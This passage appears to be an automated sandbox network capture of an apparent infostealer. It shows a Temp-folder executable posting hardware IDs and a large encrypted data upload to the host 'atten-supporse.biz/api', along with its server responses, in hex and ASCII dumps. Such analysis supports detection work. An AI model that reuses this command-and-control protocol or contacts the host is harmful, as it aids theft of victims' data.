2024-11-30 03:06:33 UTC	1022	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 03:06:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l0tcgqedmniammsi66u4iprvgg; expires=Tue, 25-Mar-2025 20:53:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vu98SWB4KlYGFeA4JAinFPCJpkNMWIYPWsum%2BPFTazC7A5IE4RE2%2FFG94mcuFjlOCe6ucAPDO8BSXfr3TpiD1QICe%2BRWta%2BzevkV9uNVWldCujHa1c6fYAqKm94COaVgbr%2F3T1o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ea79f40fb7843fa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1821&min_rtt=1734&rtt_var=712&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9668&delivery_rate=1683967&cwnd=149&unsent_bytes=0&cid=b6215c8de713a4f5&ts=1208&x=0"
2024-11-30 03:06:33 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-11-30 03:06:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49823	104.21.16.9	443	7620	C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 03:06:35 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=I9C3GJUP7PWRY44KC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20437 Host: atten-supporse.biz
2024-11-30 03:06:35 UTC	15331	OUT	Data Raw: 2d 2d 49 39 43 33 47 4a 55 50 37 50 57 52 59 34 34 4b 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 45 39 30 41 39 43 39 45 44 43 44 35 44 34 45 46 41 33 44 36 33 42 36 39 45 37 43 41 31 34 0d 0a 2d 2d 49 39 43 33 47 4a 55 50 37 50 57 52 59 34 34 4b 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 39 43 33 47 4a 55 50 37 50 57 52 59 34 34 4b 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --I9C3GJUP7PWRY44KCContent-Disposition: form-data; name="hwid"95E90A9C9EDCD5D4EFA3D63B69E7CA14--I9C3GJUP7PWRY44KCContent-Disposition: form-data; name="pid"3--I9C3GJUP7PWRY44KCContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-11-30 03:06:35 UTC	5106	OUT	Data Raw: 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-11-30 03:06:36 UTC	1027	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 03:06:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ibv17cq2atd2ssav57duuvafap; expires=Tue, 25-Mar-2025 20:53:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XcHS%2Fb68beL3QMXd6Qsh7bzlfXHcOVfR4E6QCUrb%2FkMjHHlRL4irlQsRn8%2BQvZK3a%2F9ukawefAmLJ2ZH%2FSyXjBJ%2FA9jgRoXtdgsZwM0WOy39IOibcb7fW1IFuSiqkImDArCL%2BOk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ea79f52e9b143d9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1737&rtt_var=662&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21400&delivery_rate=1638608&cwnd=221&unsent_bytes=0&cid=caf41480996a8758&ts=916&x=0"
2024-11-30 03:06:36 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-11-30 03:06:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49828	104.21.16.9	443	7620	C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 03:06:37 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Z00LZA2ILIC3KVG0YKP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1268 Host: atten-supporse.biz
2024-11-30 03:06:37 UTC	1268	OUT	Data Raw: 2d 2d 5a 30 30 4c 5a 41 32 49 4c 49 43 33 4b 56 47 30 59 4b 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 45 39 30 41 39 43 39 45 44 43 44 35 44 34 45 46 41 33 44 36 33 42 36 39 45 37 43 41 31 34 0d 0a 2d 2d 5a 30 30 4c 5a 41 32 49 4c 49 43 33 4b 56 47 30 59 4b 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 30 30 4c 5a 41 32 49 4c 49 43 33 4b 56 47 30 59 4b 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 Data Ascii: --Z00LZA2ILIC3KVG0YKPContent-Disposition: form-data; name="hwid"95E90A9C9EDCD5D4EFA3D63B69E7CA14--Z00LZA2ILIC3KVG0YKPContent-Disposition: form-data; name="pid"1--Z00LZA2ILIC3KVG0YKPContent-Disposition: form-data; name="lid"LOGS11--Li
2024-11-30 03:06:38 UTC	1020	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 03:06:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h3tqooo457sb4e88bf07ehgb0m; expires=Tue, 25-Mar-2025 20:53:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sLKYzpKB6PwEO9E2dfODUVglnwz4ooLI7fiJN%2BIfSzQAa38q7FQ%2BlheZrI9%2FT%2BZ3ns6p70%2FqifeFC0BVhUeM0jeGLWHzC2A6zHujGaRDGixe1XLF44lufR6VQ01PMXgCRLR4Pc0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ea79f632cb8728f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1825&rtt_var=689&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2188&delivery_rate=1582655&cwnd=149&unsent_bytes=0&cid=5d0f43d6c7124682&ts=869&x=0"
2024-11-30 03:06:38 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-11-30 03:06:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49836	104.21.16.9	443	7620	C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 03:06:40 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JE65Y1NC6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 581335 Host: atten-supporse.biz
2024-11-30 03:06:40 UTC	15331	OUT	Data Raw: 2d 2d 4a 45 36 35 59 31 4e 43 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 45 39 30 41 39 43 39 45 44 43 44 35 44 34 45 46 41 33 44 36 33 42 36 39 45 37 43 41 31 34 0d 0a 2d 2d 4a 45 36 35 59 31 4e 43 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 45 36 35 59 31 4e 43 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4a 45 36 35 59 31 4e 43 36 0d 0a 43 6f 6e 74 65 6e Data Ascii: --JE65Y1NC6Content-Disposition: form-data; name="hwid"95E90A9C9EDCD5D4EFA3D63B69E7CA14--JE65Y1NC6Content-Disposition: form-data; name="pid"1--JE65Y1NC6Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--JE65Y1NC6Conten
2024-11-30 03:06:40 UTC	15331	OUT	Data Raw: a3 cf 29 52 ce 97 b1 7f 62 ec 50 7e f3 3f be 6a 51 8c 0b 1b d2 2f 26 1d bf b6 6a d6 bb ab 73 d8 16 19 15 55 c9 db 26 b3 dc 9c 26 ba f5 8a 9a 54 e2 a0 bd 4f e8 62 96 2a 36 a2 22 fe 38 13 78 1f 84 ca 2e d5 cc 94 5e e3 c7 0d 0c 6e e5 15 12 1f c3 5e ea 84 81 12 a5 4a 04 fd 79 7a a3 a1 36 66 e8 c8 d9 49 ed f0 bf 3e ee 13 b5 c1 dc 6e e9 27 38 f3 3f 2f 3c 38 b5 66 3e 23 d3 55 f5 20 5b 1d cd 9e 56 37 65 bf 7f 9f 0a d1 77 98 0a d9 d0 57 cd 3b d8 54 3d 51 0d 4a 92 f6 84 14 de 9d 69 e9 e2 3c 93 5f 81 1b e4 ef 81 b6 a0 ea e8 de 84 d3 9c 1d b3 85 26 61 ee 87 52 f6 e2 a6 19 43 2e 6e 3e ca 5d ab bc 21 bc 0d e7 f3 d7 d7 6b 0e 52 cf b3 d3 e7 7d 62 84 01 d0 8b a0 5a a3 52 68 96 45 62 f4 9f e2 dd ab 27 fd 96 bf 84 e7 80 1e 61 df db ba 4f 40 4f 35 60 07 ef 5e 4f 3e f8 c9 75 Data Ascii: )RbP~?jQ/&jsU&&TOb*6"8x.^n^Jyz6fI>n'8?/<8f>#U [V7ewW;T=QJi<_&aRC.n>]!kR}bZRhEb'aO@O5`^O>u
2024-11-30 03:06:40 UTC	15331	OUT	Data Raw: b9 99 c0 1e 28 cf d9 e1 27 0f 54 31 8d 5b b1 44 c2 46 2a 08 b7 81 fc ff ed 3d 24 e1 c7 30 76 41 bd a6 25 b9 37 5e 51 6c 14 d8 93 9a 5e 36 42 c1 f3 a3 71 1c a0 f8 a9 18 ec cf 9b 29 ed be f1 e4 30 41 25 20 bd 8b 29 37 9b ad 63 e9 5c 67 6d 84 12 f5 b2 78 1e cd c1 20 d8 4d 59 1b ca 7b a1 10 4d 1f da 02 8b 1e 87 cc 2e 36 48 0a ea ba 9d 7f af 74 c1 6f 5f a4 90 da eb 54 1a e1 3b 2d 33 03 4e e0 f3 85 a0 93 17 55 7f df 61 2b 09 22 99 84 41 74 93 dd e5 3c ce 15 31 6c 66 2b cc 2f f6 7a 3d 09 e0 9b b4 be b3 d9 fd 55 40 b9 a6 12 ab b9 e6 d5 f5 34 d4 ce 65 63 e0 31 ac cc e9 36 83 6e 9d 46 cc ef e5 71 1a 6d 85 a8 fb 30 27 25 cf 93 3a 18 91 5e bc 31 84 e7 11 df 78 44 5d 21 de 87 0e 95 e2 ec f3 0c e0 f8 bd f9 87 40 f9 bf c8 c0 d8 9c 2f 8e da fb a2 eb 87 b7 4b 6f 4a 47 85 Data Ascii: ('T1[DF*=$0vA%7^Ql^6Bq)0A% )7c\gmx MY{M.6Hto_T;-3NUa+"At<1lf+/z=U@4ec16nFqm0'%:^1xD]!@/KoJG
2024-11-30 03:06:40 UTC	15331	OUT	Data Raw: a0 8a 5c 5e 1f d2 87 0c 5f 77 97 4e 1c 30 8c 0a df 0b 8e 1b 20 ce 18 17 f1 45 07 dd c3 30 56 47 9a ef 6f 98 24 1a 83 95 94 8b ac 3f 7a 06 fd c7 52 87 66 9e 87 af 40 39 c8 e0 8b 0e c4 ae c4 ed ea 23 77 5f 35 df b2 36 7e c4 b0 e9 08 f2 00 82 90 73 cf 39 bb 02 c5 df 9d 55 4b 83 b5 2a 05 9c d3 03 42 64 5f ce 51 f6 18 0a 84 67 b7 d4 4a 64 5c fe 2f 7e 7f dc b9 e1 23 7d e1 cb 27 ef 0b 16 9d 03 5b 6c e6 05 cf d7 dc 1d 08 a0 04 78 6d 55 ee c1 56 77 5f b0 3f 1f 55 2d aa 5d 2a 00 0e 25 10 d9 90 eb bc b4 89 db 42 a9 fc 36 91 52 59 90 c7 22 fa d5 dd 89 8a 17 4e a9 f0 bd bd 09 3c e7 cb 4c 88 a6 80 b4 65 18 d9 cf 0d 6f a6 d0 37 22 ef 70 4e 42 bc 09 f0 c8 a5 0c 80 fc 4e 10 bf 9b f9 72 79 f4 3c 41 f4 39 c3 40 4f 5d f2 3e a4 b6 8e 00 9a 01 1e 50 88 8b 65 b5 0d b0 9a bc e0 Data Ascii: \^_wN0 E0VGo$?zRf@9#w_56~s9UKBd_QgJd\/~#}'[lxmUVw_?U-]%B6RY"N<Leo7"pNBNry<A9@O]>Pe
2024-11-30 03:06:40 UTC	15331	OUT	Data Raw: 11 3a 54 9b 7a 15 30 fa 5b 3d 98 5e 20 b5 be e2 ca 93 f6 d6 ba 0e f3 13 4e 5d f5 87 d1 50 9c 93 c8 6b 6f 9e 50 78 ad 69 8d 47 a9 29 45 45 b2 07 84 eb f9 72 45 70 8a 7e 4a 07 b9 b9 d1 21 8e d0 2b d9 75 d2 ca e7 a5 35 1a 56 2c a9 39 d7 54 e4 b7 9b c4 18 34 d4 55 75 2b a1 be 33 f2 9e 98 c5 5e 11 97 09 3e 54 6b 25 09 4e dc 68 bc b4 e3 2d 30 e7 b8 37 9a ed 08 7d ed 87 cf f7 d7 cf 6c 8e fc e8 d3 93 62 cb 6b 34 d2 66 5a f6 6b 8f 46 c4 c6 a4 31 78 42 a1 78 79 d7 2f f7 2b 57 cb 54 00 cd 55 65 70 7a 09 32 ab 0e b7 cb 51 51 c5 cf 87 b6 af ac f9 8d b6 6d 58 56 b4 ac bd de 74 8b 8b ac 5b 57 3b c8 93 a8 a2 32 d0 b8 11 ef 71 48 24 cd 90 8b da 06 ec 4d f3 34 43 7f 8e 8e 72 db 80 16 04 ff 7d 4f c5 61 92 69 05 27 e4 47 b4 68 f3 dd c1 55 ef 74 92 43 5e 2d 57 86 d3 3a c5 93 Data Ascii: :Tz0[=^ N]PkoPxiG)EErEp~J!+u5V,9T4Uu+3^>Tk%Nh-07}lbk4fZkF1xBxy/+WTUepz2QQmXVt[W;2qH$M4Cr}Oai'GhUtC^-W:
2024-11-30 03:06:40 UTC	15331	OUT	Data Raw: e2 e7 89 f5 d1 2e 9f aa 43 95 7e 2b be e8 df 6e bb 8f eb 06 b0 bc 52 b1 36 f0 64 db 2a 3c 88 38 cc b4 e8 56 79 9d 96 23 b1 29 26 3d 1d 52 b2 85 dd da 9b 32 62 b1 37 f3 06 be ac c1 44 66 02 9a 1f be c7 08 5c 74 95 0f d5 77 6e ad 31 f6 c4 88 9c a9 42 e0 bc 54 72 cc a2 78 6b c8 e3 d4 b1 d9 e4 6a 87 03 5e 13 7d 6a 85 e9 05 a2 33 64 a4 f9 24 df f7 22 5f c1 be 18 2f 75 9d ec 5d ca ea 18 55 c0 0b 89 8a 32 d7 e6 53 0b b1 fd fe 99 2e 36 93 02 87 75 9a bd 7d b7 f6 09 25 27 ec cd d3 e1 f2 e9 25 42 46 9e a0 f8 d0 c8 0e 90 b9 70 8e d9 c0 38 74 d9 23 d6 14 cb 9a fa 58 f0 a9 b2 0b 72 4b 09 13 40 8e b0 23 7e c5 3f 21 d2 08 d8 c5 5c 9e a9 81 69 a0 46 25 6c 72 7a 26 a7 19 07 f6 ab b5 db c3 8f c1 8c 62 f5 7f 8c 92 d6 e0 c9 d6 2b 3c 81 7b 01 0b aa f2 bd 48 a4 f9 91 53 95 33 Data Ascii: .C~+nR6d*<8Vy#)&=R2b7Df\twn1BTrxkj^}j3d$"_/u]U2S.6u}%'%BFp8t#XrK@#~?!\iF%lrz&b+<{HS3
2024-11-30 03:06:40 UTC	15331	OUT	Data Raw: 2a c6 7b 85 0f 1f 4e 1b 43 34 05 db ec 33 97 3e 5d fe 37 db 21 7f 47 e9 4a 8b e1 b3 fe bb 55 c6 a5 73 5d fd 7f 5f b9 5b fa ad f6 9f 57 77 ca f6 95 2e 4d ea ee 26 70 7b 5b ff ae e2 fe 19 de 43 d8 58 4a 6b c5 2e be 52 06 3d 69 02 83 14 18 16 11 30 a9 da bc 2e 0a d2 18 60 b1 6e fc f7 21 90 8d 82 99 da 99 5a 38 0b 40 c8 86 50 08 84 38 58 17 87 72 5e 0f a8 fd 3a 8d e4 85 52 70 72 cb ec 83 3d 06 08 5e b8 28 7e 78 3f 21 6b f3 62 7f fa 47 8d ef 3b 45 4c d1 e1 30 fc ac e9 f2 72 77 77 e5 9f 85 ab a2 a9 61 6c c3 1c b3 0f 31 2c 6f ef 0d f7 17 8f 20 52 86 17 fd 10 98 b5 f6 16 06 22 82 d8 16 c9 ed e6 88 bc e5 f5 92 47 cd b7 2f 8b 6a e2 79 29 b6 ff e8 d2 c3 0b 9e f8 b6 7f e0 55 79 a8 4b 0e 96 87 ee 94 82 20 0c 7c 08 83 7f b7 0b 2f 80 f8 33 95 9e 2d 68 33 56 e5 c7 47 3f Data Ascii: *{NC43>]7!GJUs]_[Ww.M&p{[CXJk.R=i0.`n!Z8@P8Xr^:Rpr=^(~x?!kbG;EL0rwwal1,o R"G/jy)UyK \|/3-h3VG?
2024-11-30 03:06:40 UTC	15331	OUT	Data Raw: f7 40 f4 0c 2b 75 78 f0 1d b7 0d a5 35 1f 94 ec 2b 51 39 89 7c b4 b0 16 92 71 b4 ca 9f 9d 0c e2 86 18 61 46 ac 82 f8 cd 49 7e 30 c2 b7 4a ba 33 71 74 a3 2f 23 e7 3f d7 f2 bb 8c e0 62 d6 cd bb 06 73 11 f3 4a 77 b8 39 82 83 05 5f 76 a7 fd 30 b9 6f b7 e1 bd 58 da 96 a6 94 d2 1a 5a 53 e1 72 e9 d2 e6 26 9b c5 b9 1f 6f c6 d1 67 1c 9d 5b b6 08 9c 90 82 7b 2d 24 ba 01 35 46 e2 7f c1 63 36 b8 9c f9 98 c0 b2 1c 39 12 c9 99 2d 9f 70 75 19 9c 29 5f ee 5e e1 20 15 15 43 ca d8 2c 94 16 96 36 99 f2 d4 bf 64 41 09 b7 a6 29 10 83 b1 e4 23 f1 59 96 36 11 24 09 59 bf 08 e7 06 90 7a 15 5b 3b 2c 2a dc 7f 2f 28 b4 56 52 8e 10 12 8b be 31 e2 08 32 9a 1b 9c 73 c0 66 68 04 da 75 ad 16 e6 7d c9 b8 84 c5 c7 bf 7f 2c 08 0f 0b 42 7f d2 e8 ee c1 9f 85 18 ab fe 33 5b 13 fe a7 aa f8 82 Data Ascii: @+ux5+Q9\|qaFI~0J3qt/#?bsJw9_v0oXZSr&og[{-$5Fc69-pu)_^ C,6dA)#Y6$Yz[;,*/(VR12sfhu},B3[
2024-11-30 03:06:40 UTC	15331	OUT	Data Raw: a1 1c 1a 12 b4 88 cd ff c9 28 24 97 a1 82 2e 90 dc 48 b0 ca c9 df 33 c7 a5 a9 1f 13 75 46 57 2f ba 25 06 61 ba 82 be d6 30 c1 ca ee 19 9b 7a fb b6 75 c7 53 bf fe d4 d5 fe bd 2d c8 2e 7f 81 47 14 1d 79 33 21 e4 dd 08 ca eb d2 e8 a4 e5 1b 61 70 12 da ab 35 6d f4 59 75 8a 50 c0 c2 b7 0c ca cc c2 2e 4c 8d 13 f9 26 6a 17 ea db 2a 4d 8e b0 ec 4f bd 06 bc 7e 24 ec 8f e0 e7 18 a0 9b 0b 2d a3 18 9c b2 3c b4 0b 5f 7e 82 9a c7 c6 40 3e 95 c8 26 45 57 dd 45 db d1 b3 8d 00 0e 2b b5 8d 14 db 9d b2 8b a7 da 2a 38 5a 82 35 c0 42 bf d6 5f bc 72 d9 4f 3b ba ee f6 10 19 96 6f 80 30 78 bc 90 e2 e5 b7 2a ca f7 1a ec 75 67 76 ad bd 50 15 7a 6c ac 73 3f 2a fd 02 eb 08 52 75 56 03 9f ba 6e 9b b7 f1 cc 0f 6f d3 cd 8f 53 3d 9f c7 52 3c fc de 15 d0 32 70 06 8b e3 23 1b 27 f8 ad 3f Data Ascii: ($.H3uFW/%a0zuS-.Gy3!ap5mYuP.L&jMO~$-<_~@>&EWE+8Z5B_rO;o0xugvPzls?RuVnoS=R<2p#'?
2024-11-30 03:06:40 UTC	15331	OUT	Data Raw: d1 57 61 35 87 91 a0 d6 fe ba a6 3d 74 e0 2a 2b 5f 95 ef 10 d3 ca 3e 3b 68 e5 3c ae 77 3a 45 1d aa fa 46 2e 81 2c 2b 65 30 b3 75 c6 d0 46 f5 14 19 99 e6 d0 46 45 8d f2 5c 33 61 4e ab 9b 76 fe d9 6f 7d 49 a8 36 89 e2 34 19 41 29 c3 bc 12 71 c8 bb 4c ae 0d 93 85 b6 c8 7c aa 14 02 22 76 45 81 84 a3 2c ce ba ff 18 91 dd 17 d3 1e 5a 8a 6b ae 0b c8 7f c5 40 e7 ec 52 2c ff 77 9c 94 fd 51 69 ed 9b 1c ed db f2 e9 01 b6 88 72 04 83 3c ff eb 22 ae 30 d9 8a 59 e3 dd 8f 52 dd d3 1f 52 24 dd a7 3b b5 cc 72 a8 cb 8a b4 af 7d a7 52 4e 60 fd c8 4c 29 2d 3a 4f 6c fa 56 de ad 1c 56 e8 a7 2d d9 ff 4e 98 39 31 bf 1d 90 9c 62 43 71 5f 2d 4e 85 0f fc eb 65 b0 67 f9 43 dd ec 8b d9 c8 f7 d2 8d 5e e1 2f 17 ab f5 66 dc 95 67 2d ff 41 9f fd 07 ed 1a 21 35 5b 2d da b1 f6 8d d5 37 53 Data Ascii: Wa5=t*+_>;h<w:EF.,+e0uFFE\3aNvo}I64A)qL\|"vE,Zk@R,wQir<"0YRR$;r}RN`L)-:OlVV-N91bCq_-NegC^/fg-A!5[-7S
2024-11-30 03:06:48 UTC	1029	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 03:06:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t6rhq83244v93rao50s5qao47j; expires=Tue, 25-Mar-2025 20:53:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0U1gzdF5me4aZtHb7hvTnxwdrXurWiJhzr0oJsDnvhCqumPwZSnHl812mMN%2B%2B%2BpuCIRNPImpTOblUnkvRgGsI1iav6N3%2BFjUfSFrSC60lGC4E%2BXcF%2BakqKLS2S15fNRlPpnqtrc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ea79f733aac0f7b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1640&rtt_var=627&sent=320&recv=578&lost=0&retrans=0&sent_bytes=2847&recv_bytes=583897&delivery_rate=1729857&cwnd=205&unsent_bytes=0&cid=5399d608492df779&ts=8483&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49877	104.21.16.9	443	7620	C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 03:06:50 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: atten-supporse.biz
2024-11-30 03:06:50 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 39 35 45 39 30 41 39 43 39 45 44 43 44 35 44 34 45 46 41 33 44 36 33 42 36 39 45 37 43 41 31 34 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=95E90A9C9EDCD5D4EFA3D63B69E7CA14
2024-11-30 03:06:51 UTC	1020	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 03:06:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=25ig226k8b6j79v7teur3km1fv; expires=Tue, 25-Mar-2025 20:53:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KYL22HisWeLjT1bnHzQmgljDfkQ%2F4qj3QVL%2BKF4eOA02Wqe0wokTGb2V7RvR4vEBSv82z9FlxG%2FVG%2FEs3%2FJZSzAyMf0muKzyoOtBgefb6Q6P28T6b0t4Ku5qePrxZOLlNlpGhnM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ea79fb2099e0ca4-EWR alt-svc: h3=":443"; ma=86400 server-timing: 